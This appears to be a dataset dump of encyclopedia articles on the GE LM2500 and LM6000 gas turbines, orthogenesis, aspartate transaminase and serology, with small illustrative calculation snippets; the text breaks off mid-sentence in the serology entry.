Dataset columns: id (int64), url (string), text (string), source (string), categories (list), token_count (int64), subcategories (list).
1,062,621
https://en.wikipedia.org/wiki/General%20Electric%20LM2500
The General Electric LM2500 is an industrial and marine gas turbine produced by GE Aviation. The LM2500 is a derivative of the General Electric CF6 aircraft engine. As of 2004, the U.S. Navy and at least 29 other navies had used a total of more than one thousand LM2500/LM2500+ gas turbines to power warships. Other uses include hydrofoils, hovercraft and fast ferries. In 2012, GE developed an FPSO version to serve the oil and gas industry's demand for a lighter, more compact version to generate electricity and drive compressors to send natural gas through pipelines. Design and development The LM2500 was first used by the US Navy in 1969, after the original FT-4 gas turbines experienced many technical problems. Later, LM2500s were used in US Navy warships of the Spruance class of destroyers and the related Kidd class, which were constructed from 1970. This configuration was subsequently used into the 1980s in the Ticonderoga-class cruisers and Oliver Hazard Perry-class frigates. It was also used by one of the People's Republic of China's Type 052 (Luhu-class) missile destroyers, Harbin (112), acquired before the embargo. The LM2500 was uprated for the Arleigh Burke-class destroyers, which were initiated in the 1980s and started to see service in the early 1990s, and for the T-AOE-6 class of fast combat support ships. In 2001 the LM2500 (20 MW) was installed in a sound-proof capsule in the South African Navy's Meko A-200 SAN frigates as part of a CODAG propulsion system with two MTU 16V 1163 TB93 propulsion diesels. The current generation was further uprated in the late 1990s. LM2500 installations place the engine inside a metal container for sound and heat isolation from the rest of the machinery spaces. This container is very close to the size of a standard intermodal shipping container, though not identical: the engine very slightly exceeds those dimensions. The air intake ducting may be designed and shaped appropriately for easy removal of the LM2500 from the ship. The LM2500+ is an evolution of the LM2500, delivering up to 28.6 MW of electrical power when combined with an electrical generator. Two such turbo-generators have been installed in the superstructure near the funnel of Queen Mary 2, the world's largest transatlantic ocean liner, providing additional electrical power for the liner to reach higher sea speeds. Celebrity Cruises uses two LM2500+ engines in its Millennium-class ships in a COGAS cycle (strictly COGES, as the turbines generate electricity rather than driving the shafts directly). The LM2500 is license-built in India by Hindustan Aeronautics Limited; in Italy by Avio Aero; and in Japan by IHI Corporation. (Following the February 2024 reporting of an IHI company whistleblower, IHI announced on April 24, 2024 that an investigation was underway by Japan's Ministry of Land, Infrastructure, Transport and Tourism into its subsidiary, IHI Power Systems Co., which had falsified its engine data since 2003, impacting over 4,000 engines globally.) The LM2500/LM2500+ can often be found as the turbine part of CODAG, CODOG and CODLAG propulsion systems, or in pairs as the powerplant of COGAG systems.
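Ratings for this family are quoted variously in shaft horsepower, kilowatts, and thermal efficiency (see the Variants section below), and the unit arithmetic is easy to automate. A minimal Python sketch, assuming only the standard conversion 1 shp ≈ 745.7 W; the function names are illustrative, not GE nomenclature:

```python
# Cross-check the LM2500+G4 figures quoted under Variants below (illustrative only).
SHP_TO_KW = 0.7457  # 1 shaft horsepower ≈ 745.7 W

def shp_to_kw(shp: float) -> float:
    """Convert shaft horsepower to kilowatts."""
    return shp * SHP_TO_KW

def fuel_input_kw(output_kw: float, thermal_efficiency: float) -> float:
    """Fuel energy input rate implied by an output and an LHV thermal efficiency."""
    return output_kw / thermal_efficiency

print(shp_to_kw(47_370))             # ≈ 35,322 kW, matching the quoted 35,320 kW
print(fuel_input_kw(35_320, 0.393))  # ≈ 89,873 kW of fuel input on an LHV basis
```

At 39.3 percent efficiency, roughly 90 MW of fuel energy is consumed to deliver about 35 MW of shaft power, which is why the fractional efficiency gains between generations matter at this scale.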
Applications Aircraft carrier: (Italian Navy) (Italian Navy) (Royal Thai Navy) (Spanish Navy) (Indian Navy) Amphibious assault ship: (United States Navy) (Royal Australian Navy) (Spanish Navy) (United States Navy) Cruiser: (United States Navy) Destroyer: (United States Navy) (Royal Australian Navy) (Japan Maritime Self-Defense Force) (Italian Navy) (Republic of Korea Navy) (Republic of China Navy) (Republic of Korea Navy) (Japan Maritime Self-Defense Force) (United States Navy) Type 052 destroyer (People's Liberation Army Navy) Project 18 (Indian Navy) Frigate: (Royal Australian Navy) (Spanish Navy) (Royal Australian Navy, Royal New Zealand Navy) (German Navy) (Turkish Navy) (Royal Thai Navy) (German Navy) (German Navy) (Republic of China Navy) (United States Navy) FREMM multipurpose frigate (French Navy, Italian Navy, Royal Moroccan Navy) (Royal Norwegian Navy) (Royal Canadian Navy) (French Navy, Italian Navy) (Hellenic Navy) (Pakistan Navy) (Royal Thai Navy) (Indian Navy) (United States Navy) (German Navy) (Spanish Navy) (Indian Navy) (South African Navy) (Portuguese Navy) (Republic of Korea Navy) (Turkish Navy) Fast Combat Support Ship: (United States Navy) Maritime Prepositioning Force: (United States Navy) Littoral combat ship: (United States Navy) Corvette: (Finnish Navy) (Royal Danish Navy) (Israeli Navy) (Philippine Navy) (Brazilian Navy) (Turkish Navy) Next Generation Missile Vessels (Indian Navy) Maritime Security Cutter, Large: (United States Coast Guard) Fast Attack Patrol boat (United States Navy) (Indonesian Navy) Passenger Ship: Queen Mary 2 ocean liner (Cunard Line) (Holland America Line) (Princess Cruises) (Princess Cruises) (Celebrity Cruises) (Royal Caribbean International) Variants The LM2500 is available in three versions: The base LM2500 achieves a thermal efficiency of 37 percent at ISO conditions; when coupled with an electric generator, it delivers 24 MW of electricity at 60 Hz with a thermal efficiency of 36 percent at ISO conditions. The improved, third-generation LM2500+ achieves a thermal efficiency of 39 percent at ISO conditions; when coupled with an electric generator, it delivers 29 MW of electricity at 60 Hz with a thermal efficiency of 38 percent at ISO conditions. The latest, fourth-generation LM2500+G4 was introduced in November 2005 and delivers 47,370 shp (35,320 kW) with a thermal efficiency of 39.3 percent at ISO conditions. Derivatives The GE TM2500 is derived from the LM2500 and mounted on a trailer, making it possible to move it wherever 30 MW of temporary electricity generation is required. It can be installed and commissioned in 11 days. Specification The basic LM2500 has a single-shaft gas generator derived from the CF6, comprising a 16-stage compressor driven by a two-stage air-cooled HP turbine. The combustion chamber is annular. Shaft power is generated by a 6-stage power turbine mounted in the gas generator exhaust stream. Additional power is obtained from the LM2500+ by the addition of a zero stage to the compressor, making 17 stages in all. See also References External links Official GE Aviation page for LM2500 (GEAE). Official GE Aviation page for LM2500+. Official GE Aviation page for LM2500+G4. FAS information page on US Navy LM2500 usage SA Navy Valour class frigate page Power Generation plants Simple and combined cycle 50 Hz Simple and combined cycle 60 Hz Aero-derivative engines Gas turbines Marine engines
General Electric LM2500
[ "Technology" ]
1,493
[ "Marine engines", "Aero-derivative engines", "Engines", "Gas turbines" ]
1,062,901
https://en.wikipedia.org/wiki/Orthogenesis
Orthogenesis, also known as orthogenetic evolution, progressive evolution, evolutionary progress, or progressionism, is an obsolete biological hypothesis that organisms have an innate tendency to evolve in a definite direction towards some goal (teleology) due to some internal mechanism or "driving force". According to the theory, the largest-scale trends in evolution have an absolute goal such as increasing biological complexity. Prominent historical figures who have championed some form of evolutionary progress include Jean-Baptiste Lamarck, Pierre Teilhard de Chardin, and Henri Bergson. The term orthogenesis was introduced by Wilhelm Haacke in 1893 and popularized by Theodor Eimer five years later. Proponents of orthogenesis rejected the theory of natural selection as the organizing mechanism in evolution in favour of a rectilinear (straight-line) model of directed evolution. With the emergence of the modern synthesis, in which genetics was integrated with evolution, orthogenesis and other alternatives to Darwinism were largely abandoned by biologists, but the notion that evolution represents progress is still widely shared; modern supporters include E. O. Wilson and Simon Conway Morris. The evolutionary biologist Ernst Mayr made the term effectively taboo in the journal Evolution in 1948, by stating that it implied "some supernatural force". The American paleontologist George Gaylord Simpson (1953) attacked orthogenesis, linking it with vitalism by describing it as "the mysterious inner force". Despite this, many museum displays and textbook illustrations continue to give the impression that evolution is directed. The philosopher of biology Michael Ruse notes that in popular culture, evolution and progress are synonyms, while the unintentionally misleading image of the March of Progress, from apes to modern humans, has been widely imitated. Definition The term orthogenesis (from Ancient Greek orthós, "straight", and génesis, "origin") was first used by the biologist Wilhelm Haacke in 1893. Theodor Eimer was the first to give the word a definition; he defined orthogenesis as "the general law according to which evolutionary development takes place in a noticeable direction, above all in specialized groups". Further definitions were offered by the zoologist Michael F. Guyer in 1922 and by Susan R. Schrepfer in 1983. In 1988, Francisco J. Ayala defined progress as "systematic change in a feature belonging to all the members of a sequence in such a way that posterior members of the sequence exhibit an improvement of that feature". He argued that there are two elements in this definition, directional change and improvement according to some standard. Whether a directional change constitutes an improvement is not a scientific question; therefore Ayala suggested that science should focus on the question of whether there is directional change, without regard to whether the change is "improvement". This may be compared to Stephen Jay Gould's suggestion of "replacing the idea of progress with an operational notion of directionality". A further definition was given by Peter J. Bowler in 1989, and in 1996 Michael Ruse defined orthogenesis as "the view that evolution has a kind of momentum of its own that carries organisms along certain tracks". History Medieval The possibility of progress is embedded in the mediaeval great chain of being, with a linear sequence of forms from lowest to highest.
The concept, indeed, had its roots in Aristotle's biology, from insects that produced only a grub, to fish that laid eggs, and on up to animals with blood and live birth. The medieval chain, as in Ramon Lull's Ladder of Ascent and Descent of the Mind, 1305, added steps or levels above humans, with orders of angels reaching up to God at the top. Pre-Darwinian The orthogenesis hypothesis had a significant following in the 19th century when evolutionary mechanisms such as Lamarckism were being proposed. The French zoologist Jean-Baptiste Lamarck (1744–1829) himself accepted the idea, and it had a central role in his theory of inheritance of acquired characteristics, the hypothesized mechanism of which resembled the "mysterious inner force" of orthogenesis. Orthogenesis was particularly accepted by paleontologists who saw in their fossils a directional change, and in invertebrate paleontology thought there was a gradual and constant directional change. Those who accepted orthogenesis in this way, however, did not necessarily accept that the mechanism that drove orthogenesis was teleological (had a definite goal). Charles Darwin himself rarely used the term "evolution", now so commonly used to describe his theory, because the term was strongly associated with orthogenesis, as had been common usage since at least 1647. His grandfather, the physician and polymath Erasmus Darwin, was both progressionist and vitalist, seeing "the whole cosmos [as] a living thing propelled by an internal vital force" towards "greater perfection". Robert Chambers, in his popular, anonymously published 1844 book Vestiges of the Natural History of Creation, presented a sweeping narrative account of cosmic transmutation, culminating in the evolution of humanity. Chambers included detailed analysis of the fossil record. With Darwin Ruse observed that "Progress (sic, his capitalisation) became essentially a nineteenth-century belief. It gave meaning to life—it offered inspiration—after the collapse [with Malthus's pessimism and the shock of the French Revolution] of the foundations of the past." The Baltic German biologist Karl Ernst von Baer (1792–1876) argued for an orthogenetic force in nature, reasoning in a review of Darwin's 1859 On the Origin of Species that "Forces which are not directed—so-called blind forces—can never produce order." In 1864, the Swiss anatomist Albert von Kölliker (1817–1905) presented his orthogenetic theory, heterogenesis, arguing for wholly separate lines of descent with no common ancestor. In 1884, the Swiss botanist Carl Nägeli (1817–1891) proposed a version of orthogenesis involving an "inner perfecting principle". Gregor Mendel died that same year; Nägeli, who proposed that an "idioplasm" transmitted inherited characteristics, dissuaded Mendel from continuing to work on plant genetics. According to Nägeli, many evolutionary developments were nonadaptive and variation was internally programmed. Charles Darwin saw this as a serious challenge, replying that "There must be some efficient cause for each slight individual difference", but was unable to provide a specific answer without knowledge of genetics. Further, Darwin was himself somewhat progressionist, believing for example that "Man" was "higher" than the barnacles he studied, and he expressed such progressionist sentiments in his 1859 Origin of Species. In 1898, after studying butterfly coloration, Theodor Eimer (1843–1898) popularized the term orthogenesis with a widely read book, On Orthogenesis: And the Impotence of Natural Selection in Species Formation.
Eimer claimed there were trends in evolution with no adaptive significance that would be difficult to explain by natural selection. Supporters of orthogenesis held that such trends could in some cases lead species to extinction. Eimer linked orthogenesis to neo-Lamarckism in his 1890 book Organic Evolution as the Result of the Inheritance of Acquired Characteristics According to the Laws of Organic Growth. He used examples such as the evolution of the horse to argue that evolution had proceeded in a regular single direction that was difficult to explain by random variation. Gould described Eimer as a materialist who rejected any vitalist or teleological approach to orthogenesis, arguing that Eimer's criticism of natural selection was common amongst many evolutionists of his generation; they were searching for alternative mechanisms, as they had come to believe that natural selection could not create new species. Nineteenth and twentieth centuries Numerous versions of orthogenesis have been proposed. Debate centred on whether such theories were scientific, or whether orthogenesis was inherently vitalistic or essentially theological. For example, biologists such as Maynard M. Metcalf (1914), John Merle Coulter (1915), David Starr Jordan (1920) and Charles B. Lipman (1922) claimed evidence for orthogenesis in bacteria, fish populations and plants. In 1950, the German paleontologist Otto Schindewolf argued that variation tends to move in a predetermined direction. He believed this was purely mechanistic, denying any kind of vitalism: evolution occurs due to a periodic cycle of evolutionary processes dictated by factors internal to the organism. In 1964 George Gaylord Simpson argued that orthogenetic theories such as those promulgated by Du Noüy and Sinnott were essentially theology rather than biology. Though evolution is not progressive, it does sometimes proceed in a linear way, reinforcing characteristics in certain lineages, but such examples are entirely consistent with the modern neo-Darwinian theory of evolution. These examples have sometimes been referred to as orthoselection but are not strictly orthogenetic; they simply appear as linear and constant changes because of environmental and molecular constraints on the direction of change. The term orthoselection was first used by Ludwig Hermann Plate, and was incorporated into the modern synthesis by Julian Huxley and Bernard Rensch. Recent work has supported the mechanism and existence of mutation-biased adaptation, meaning that limited local orthogenesis is now seen as possible. Theories The many versions of orthogenesis differed in which other philosophies of evolution they were combined with (any of Lamarckism, mutationism, natural selection, and vitalism); the various alternatives to Darwinian evolution by natural selection were not necessarily mutually exclusive. The evolutionary philosophy of the American palaeontologist Edward Drinker Cope is a case in point. Cope, a religious man, began his career denying the possibility of evolution. In the 1860s, he accepted that evolution could occur, but, influenced by Agassiz, rejected natural selection.
Cope accepted instead the theory of recapitulation of evolutionary history during the growth of the embryo (that ontogeny recapitulates phylogeny), which Agassiz believed showed a divine plan leading straight up to man, in a pattern revealed both in embryology and palaeontology. Cope did not go so far, accepting instead that evolution created a branching tree of forms, as Darwin had suggested. Each evolutionary step was however non-random: the direction was determined in advance and had a regular pattern (orthogenesis), and steps were not adaptive but part of a divine plan (theistic evolution). This left unanswered the question of why each step should occur, and Cope switched his theory to accommodate functional adaptation for each change. Still rejecting natural selection as the cause of adaptation, Cope turned to Lamarckism to provide the force guiding evolution. Finally, Cope supposed that Lamarckian use and disuse operated by causing a vitalist growth-force substance, "bathmism", to be concentrated in the areas of the body being most intensively used; in turn, it made these areas develop at the expense of the rest. Cope's complex set of beliefs thus assembled five evolutionary philosophies: recapitulationism, orthogenesis, theistic evolution, Lamarckism, and vitalism. Other palaeontologists and field naturalists continued to hold beliefs combining orthogenesis and Lamarckism until the modern synthesis in the 1930s. Status In science The stronger versions of the orthogenetic hypothesis began to lose popularity when it became clear that they were inconsistent with the patterns found by paleontologists in the fossil record, which were non-rectilinear (richly branching) with many complications. The hypothesis was abandoned by mainstream biologists when no mechanism could be found that would account for the process, and the theory of evolution by natural selection came to prevail. The historian of biology Edward J. Larson has commented on this decline. The modern synthesis of the 1930s and 1940s, in which the genetic mechanisms of evolution were incorporated, appeared to refute the hypothesis for good. As more was understood about these mechanisms it came to be held that there was no naturalistic way in which the newly discovered mechanism of heredity could be far-sighted or have a memory of past trends. Orthogenesis was seen to lie outside the methodological naturalism of the sciences. By 1948, the evolutionary biologist Ernst Mayr, as editor of the journal Evolution, made the use of the term orthogenesis taboo: "It might be well to abstain from use of the word 'orthogenesis' ... since so many of the geneticists seem to be of the opinion that the use of the term implies some supernatural force." For these and other reasons, belief in evolutionary progress has remained "a persistent heresy" among evolutionary biologists, including E. O. Wilson and Simon Conway Morris, although often denied or veiled. The philosopher of biology Michael Ruse wrote that "some of the most significant of today's evolutionists are progressionists, and that because of this we find (absolute) progressionism alive and well in their work." He argued that progressionism has harmed the status of evolutionary biology as a mature, professional science.
Presentations of evolution remain characteristically progressionist, with humans at the top of the "Tower of Time" in the Smithsonian Institution in Washington D.C., while Scientific American magazine could illustrate the history of life as leading progressively from dinosaurs to mammals to primates and finally man. Ruse noted that at the popular level, progress and evolution are simply synonyms, as they were in the nineteenth century, though confidence in the value of cultural and technological progress has declined. The discipline of evolutionary developmental biology, however, is open to an expanded concept of heredity that incorporates the physics of self-organization. With its rise in the late 20th and early 21st centuries, ideas of constraint and preferred directions of morphological change have made a reappearance in evolutionary theory. In popular culture In popular culture, progressionist images of evolution are widespread. The historian Jennifer Tucker, writing in The Boston Globe, notes that Thomas Henry Huxley's 1863 illustration comparing the skeletons of apes and humans "has become an iconic and instantly recognizable visual shorthand for evolution." She calls its history extraordinary, saying that it is "one of the most intriguing, and most misleading, drawings in the modern history of science." Nobody, Tucker observes, supposes that the "monkey-to-man" sequence accurately depicts Darwinian evolution. The Origin of Species had only one illustration, a diagram showing that random events create a process of branching evolution, a view that Tucker notes is broadly acceptable to modern biologists. But Huxley's image recalled the great chain of being, implying with the force of a visual image a "logical, evenly paced progression" leading up to Homo sapiens, a view denounced by Stephen Jay Gould in Wonderful Life. Popular perception, however, had seized upon the idea of linear progress. Edward Linley Sambourne's Man is But a Worm, drawn for Punch's Almanack, mocked the idea of any evolutionary link between humans and animals, with a sequence from chaos to earthworm to apes, primitive men, a Victorian beau, and Darwin in a pose that according to Tucker recalls Michelangelo's figure of Adam in his fresco adorning the ceiling of the Sistine Chapel. This was followed by a flood of variations on the evolution-as-progress theme, including The New Yorker's 1925 "The Rise and Fall of Man", the sequence running from a chimpanzee to Neanderthal man, Socrates, and finally the lawyer William Jennings Bryan, who argued for the anti-evolutionist prosecution in the Scopes Trial over the State of Tennessee's law limiting the teaching of evolution. Tucker noted that Rudolph Franz Zallinger's 1965 "The Road to Homo Sapiens" fold-out illustration in F. Clark Howell's Early Man, showing a sequence of 14 walking figures ending with modern man, fitted the palaeoanthropological discoveries "not into a branching Darwinian scheme, but into the framework of the original Huxley diagram." Howell ruefully commented that the "powerful and emotional" graphic had overwhelmed his Darwinian text. Sliding between meanings Scientists, Ruse argues, continue to slide easily from one notion of progress to another: even committed Darwinians like Richard Dawkins embed the idea of cultural progress in a theory of cultural units, memes, that act much like genes. Dawkins can speak of "progressive rather than random ... trends in evolution".
Dawkins and John Krebs deny the "earlier [Darwinian] prejudice" that there is anything "inherently progressive about evolution", but, Ruse argues, the feeling of progress comes from evolutionary arms races which remain, in Dawkins's words, "by far the most satisfactory explanation for the existence of the advanced and complex machinery that animals and plants possess". Ruse concludes his detailed analysis of the idea of Progress, meaning a progressionist philosophy, in evolutionary biology by stating that evolutionary thought came out of that philosophy. Before Darwin, Ruse argues, evolution was just a pseudoscience; Darwin made it respectable, but "only as popular science". "There it remained frozen, for nearly another hundred years", until mathematicians such as Fisher provided "both models and status", enabling evolutionary biologists to construct the modern synthesis of the 1930s and 1940s. That made biology a professional science, at the price of ejecting the notion of progress. That, Ruse argues, was a significant cost to "people [biologists] still firmly committed to Progress" as a philosophy. Facilitated variation Biology has largely rejected the idea that evolution is guided in any way, but the evolution of some features is indeed facilitated by the genes of the developmental-genetic toolkit studied in evolutionary developmental biology. An example is the development of wing pattern in some species of Heliconius butterfly, which have independently evolved similar patterns. These butterflies are Müllerian mimics of each other, so natural selection is the driving force, but their wing patterns, which arose in separate evolutionary events, are controlled by the same genes. See also Adaptive mutation Convergent evolution (contrastable with orthogenesis, not involving teleology) Devolution Directed evolution (in protein engineering) Directed evolution (transhumanism) Evolutionism Evolution of biological complexity History of evolutionary thought Structuralism Teleonomy Teleological argument References Sources Further reading Bateson, William (1909). "Heredity and variation in modern lights", in Darwin and Modern Science (A. C. Seward, ed.). Cambridge University Press. Chapter V. Dennett, Daniel (1995). Darwin's Dangerous Idea. Simon & Schuster. Huxley, Julian (1942). Evolution: The Modern Synthesis. London: George Allen and Unwin. Simpson, George G. (1957). Life of the Past: Introduction to Paleontology. Yale University Press, p. 119. Wilkins, John (1997). "What is macroevolution?" Retrieved 13 October 2004. External links What our most famous evolutionary cartoon gets wrong Non-Darwinian evolution History of evolutionary biology Teleology Vitalism Obsolete biology theories
Orthogenesis
[ "Biology" ]
3,993
[ "Vitalism", "Orthogenesis", "Obsolete biology theories", "Non-Darwinian evolution", "Biology theories" ]
1,063,222
https://en.wikipedia.org/wiki/General%20Electric%20LM6000
The General Electric LM6000 is a turboshaft aeroderivative gas turbine engine. The LM6000 is derived from the CF6-80C2 aircraft turbofan. It has additions and modifications designed to make it more suitable for marine propulsion, industrial power generation, and marine power generation use. These include an expanded turbine section to convert thrust into shaft power, supports and struts for mounting on a steel or concrete deck, and reworked controls packages for power generation. It has found wide use in peaking power plants, fast ferries and high-speed cargo ship applications. Design and development The LM6000 delivers shaft power from either end of the low-pressure rotor system, which rotates at 3,600 rpm. This twin-spool design, with the low-pressure turbine speed matched to 60 Hz, the dominant electrical frequency in North America, eliminates the need for a conventional power turbine. Its high efficiency and installation flexibility also make it well suited to a wide variety of utility power generation and industrial applications, especially peaker and cogeneration plants. GE has several option packages for industrial LM6000s, including SPRINT (Spray Inter-Cooled Turbine), water injection (widely known as "NOx water"), STIG (Steam Injected Gas Turbine) technology, and DLE (Dry Low Emissions), which utilizes a combustor with premixers to maximize combustion efficiency. The SPRINT option is designed to increase the efficiency and power of the turbine, while water injection, STIG and DLE are for reducing emissions. An alternative form of power augmentation is evaporative cooling, a water-fogging system that sprays a fine mist of water into the inlet air before the air filters. This system is high-maintenance and may be replaced by chillers in newer units. The SPRINT system injects demineralized water into the engine either upstream of the low-pressure compressor or between the low-pressure and high-pressure compressors. The water injection system injects water into the primary or secondary fuel nozzle inputs, usually on natural-gas-fired engines. The GE LM6000 PC is rated to provide more than 43 MW with a thermal efficiency of around 42% LHV at ISO conditions. With options, this can be increased to around 50 MW rated power. Applications Over 1,000 LM6000 gas turbines have been shipped, with over 21 million hours of operation. Applications include power generation for combined cycle or peak power. Other applications include combined heat and power for industrial and independent power producers. See also References External links GE LM6000 website Aero-derivative engines Marine engines Gas turbines
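Two of the claims above, the 3,600 rpm rotor speed matching 60 Hz and the roughly 42% LHV efficiency, reduce to one-line calculations. A minimal sketch; the two-pole generator is my assumption, though it is the standard configuration for 3,600 rpm machines:

```python
# Why a 3,600 rpm low-pressure rotor suits 60 Hz generation directly.
def grid_frequency_hz(rpm: float, poles: int) -> float:
    """Synchronous generator frequency: f = poles * rpm / 120."""
    return poles * rpm / 120.0

print(grid_frequency_hz(3600, poles=2))  # 60.0 Hz -> no separate power turbine or gearbox
# Fuel input implied by the LM6000 PC rating quoted above (illustrative):
print(43e6 / 0.42 / 1e6)  # ≈ 102 MW of fuel on an LHV basis for 43 MW of output
```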
General Electric LM6000
[ "Technology" ]
526
[ "Marine engines", "Aero-derivative engines", "Engines", "Gas turbines" ]
1,063,353
https://en.wikipedia.org/wiki/Aspartate%20transaminase
Aspartate transaminase (AST) or aspartate aminotransferase, also known as AspAT/ASAT/AAT or (serum) glutamic oxaloacetic transaminase (GOT, SGOT), is a pyridoxal phosphate (PLP)-dependent transaminase enzyme (EC 2.6.1.1) that was first described by Arthur Karmen and colleagues in 1954. AST catalyzes the reversible transfer of an α-amino group between aspartate and glutamate and, as such, is an important enzyme in amino acid metabolism. AST is found in the liver, heart, skeletal muscle, kidneys, brain, red blood cells and gall bladder. Serum AST level, serum ALT (alanine transaminase) level, and their ratio (AST/ALT ratio) are commonly measured clinically as biomarkers for liver health. The tests are part of blood panels. The half-life of total AST in the circulation is approximately 17 hours and, on average, 87 hours for mitochondrial AST. Aminotransferase is cleared by sinusoidal cells in the liver. Function Aspartate transaminase catalyzes the interconversion of aspartate and α-ketoglutarate to oxaloacetate and glutamate. L-Aspartate (Asp) + α-ketoglutarate ↔ oxaloacetate + L-glutamate (Glu) As a prototypical transaminase, AST relies on PLP (vitamin B6) as a cofactor to transfer the amino group from aspartate or glutamate to the corresponding ketoacid. In the process, the cofactor shuttles between PLP and the pyridoxamine phosphate (PMP) form. The amino group transfer catalyzed by this enzyme is crucial in both amino acid degradation and biosynthesis. In amino acid degradation, following the conversion of α-ketoglutarate to glutamate, glutamate subsequently undergoes oxidative deamination to form ammonium ions, which are excreted as urea. In the reverse reaction, aspartate may be synthesized from oxaloacetate, which is a key intermediate in the citric acid cycle. Isoenzymes Two isoenzymes are present in a wide variety of eukaryotes. In humans: GOT1/cAST, the cytosolic isoenzyme, derives mainly from red blood cells and heart. GOT2/mAST, the mitochondrial isoenzyme, is present predominantly in liver. These isoenzymes are thought to have evolved from a common ancestral AST via gene duplication, and they share a sequence homology of approximately 45%. AST has also been found in a number of microorganisms, including E. coli, H. mediterranei, and T. thermophilus. In E. coli, the enzyme is encoded by the aspC gene and has also been shown to exhibit the activity of an aromatic-amino-acid transaminase. Structure X-ray crystallography studies have been performed to determine the structure of aspartate transaminase from various sources, including chicken mitochondria, pig heart cytosol, and E. coli. Overall, the three-dimensional polypeptide structure for all species is quite similar. AST is dimeric, consisting of two identical subunits, each with approximately 400 amino acid residues and a molecular weight of approximately 45 kDa. Each subunit is composed of a large and a small domain, as well as a third domain consisting of the N-terminal residues 3-14; these few residues form a strand, which links and stabilizes the two subunits of the dimer. The large domain, which includes residues 48-325, binds the PLP cofactor via an aldimine linkage to the ε-amino group of Lys258. Other residues in this domain – Asp222 and Tyr225 – also interact with PLP via hydrogen bonding. The small domain consists of residues 15-47 and 326-410 and represents a flexible region that shifts the enzyme from an "open" to a "closed" conformation upon substrate binding.
The two independent active sites are positioned near the interface between the two domains. Within each active site, a pair of arginine residues is responsible for the enzyme's specificity for dicarboxylic acid substrates: Arg386 interacts with the substrate's proximal (α-)carboxylate group, while Arg292 complexes with the distal (side-chain) carboxylate. In terms of secondary structure, AST contains both α and β elements. Each domain has a central sheet of β-strands with α-helices packed on either side. Mechanism Aspartate transaminase, as with all transaminases, operates via dual substrate recognition; that is, it is able to recognize and selectively bind two amino acids (Asp and Glu) with different side-chains. In either case, the transaminase reaction consists of two similar half-reactions that constitute what is referred to as a ping-pong mechanism. In the first half-reaction, amino acid 1 (e.g., L-Asp) reacts with the enzyme-PLP complex to generate ketoacid 1 (oxaloacetate) and the modified enzyme-PMP. In the second half-reaction, ketoacid 2 (α-ketoglutarate) reacts with enzyme-PMP to produce amino acid 2 (L-Glu), regenerating the original enzyme-PLP in the process. Formation of a racemic product (D-Glu) is very rare. The specific steps for the half-reaction of Enzyme-PLP + aspartate ⇌ Enzyme-PMP + oxaloacetate are as follows; the other half-reaction (not shown) proceeds in the reverse manner, with α-ketoglutarate as the substrate. Internal aldimine formation: First, the ε-amino group of Lys258 forms a Schiff base linkage with the aldehyde carbon to generate an internal aldimine. Transaldimination: The internal aldimine then becomes an external aldimine when the ε-amino group of Lys258 is displaced by the amino group of aspartate. This transaldimination reaction occurs via a nucleophilic attack by the deprotonated amino group of Asp and proceeds through a tetrahedral intermediate. At this point, the carboxylate groups of Asp are stabilized by the guanidinium groups of the enzyme's Arg386 and Arg292 residues. Quinonoid formation: The hydrogen attached to the α-carbon of Asp is then abstracted (Lys258 is thought to be the proton acceptor) to form a quinonoid intermediate. Ketimine formation: The quinonoid is reprotonated, but now at the aldehyde carbon, to form the ketimine intermediate. Ketimine hydrolysis: Finally, the ketimine is hydrolyzed to form PMP and oxaloacetate. This mechanism is thought to have multiple partially rate-determining steps. However, it has been shown that the substrate binding step (transaldimination) drives the catalytic reaction forward. Clinical significance AST is similar to alanine transaminase (ALT) in that both enzymes are associated with liver parenchymal cells. The difference is that ALT is found predominantly in the liver, with clinically negligible quantities found in the kidneys, heart, and skeletal muscle, while AST is found in the liver, heart (cardiac muscle), skeletal muscle, kidneys, brain, and red blood cells. As a result, ALT is a more specific indicator of liver inflammation than AST, as AST may be elevated also in diseases affecting other organs, such as myocardial infarction, acute pancreatitis, acute hemolytic anemia, severe burns, acute renal disease, musculoskeletal diseases, and trauma. AST was defined as a biochemical marker for the diagnosis of acute myocardial infarction in 1954. However, the use of AST for such a diagnosis is now redundant and has been superseded by the cardiac troponins.
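Because the AST/ALT comparison above is just a quotient, it is easy to sketch in code. The 2.0 cut-off below is a common textbook heuristic for an alcohol-associated pattern, not a rule stated in this article, and the function name is illustrative:

```python
# Illustrative sketch of the AST/ALT (De Ritis) ratio; not a diagnostic tool.
def ast_alt_ratio(ast_u_per_l: float, alt_u_per_l: float) -> float:
    """Return the AST/ALT ratio from serum activities in U/L."""
    return ast_u_per_l / alt_u_per_l

ratio = ast_alt_ratio(ast_u_per_l=120, alt_u_per_l=40)
if ratio >= 2.0:  # heuristic threshold, assumed here for illustration
    print(f"ratio {ratio:.1f}: pattern often associated with alcoholic liver disease")
else:
    print(f"ratio {ratio:.1f}: nonspecific; interpret against the lab's reference ranges")
```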
Laboratory tests should always be interpreted using the reference range from the laboratory that performed the test; example reference ranges vary between laboratories and assay methods. See also Alanine transaminase (ALT/ALAT/SGPT) Transaminases References Further reading External links AST - Lab Tests Online AST: MedlinePlus Medical Encyclopedia Liver function tests EC 2.6.1 Glutamate (neurotransmitter)
Aspartate transaminase
[ "Chemistry" ]
1,856
[ "Chemical pathology", "Liver function tests" ]
1,063,406
https://en.wikipedia.org/wiki/Serology
Serology is the scientific study of serum and other body fluids. In practice, the term usually refers to the diagnostic identification of antibodies in the serum. Such antibodies are typically formed in response to an infection (against a given microorganism), against other foreign proteins (in response, for example, to a mismatched blood transfusion), or to one's own proteins (in instances of autoimmune disease). In each case, the diagnostic procedure is straightforward. Serological tests Serological tests are diagnostic methods that are used to identify antibodies and antigens in a patient's sample. Serological tests may be performed to diagnose infections and autoimmune illnesses, to check if a person has immunity to certain diseases, and in many other situations, such as determining an individual's blood type. Serological tests may also be used in forensic serology to investigate crime scene evidence. Several methods can be used to detect antibodies and antigens, including ELISA, agglutination, precipitation, complement fixation, fluorescent antibodies and, more recently, chemiluminescence. Applications Microbiology In microbiology, serologic tests are used to determine if a person has antibodies against a specific pathogen, or to detect antigens associated with a pathogen in a person's sample. Serologic tests are especially useful for organisms that are difficult to culture by routine laboratory methods, like Treponema pallidum (the causative agent of syphilis), or viruses. The presence of antibodies against a pathogen in a person's blood indicates that they have been exposed to that pathogen. Most serologic tests measure one of two types of antibodies: immunoglobulin M (IgM) and immunoglobulin G (IgG). IgM is produced in high quantities shortly after a person is exposed to the pathogen, and production declines quickly thereafter. IgG is also produced on the first exposure, but not as quickly as IgM. On subsequent exposures, the antibodies produced are primarily IgG, and they remain in circulation for a prolonged period of time. This affects the interpretation of serology results: a positive result for IgM 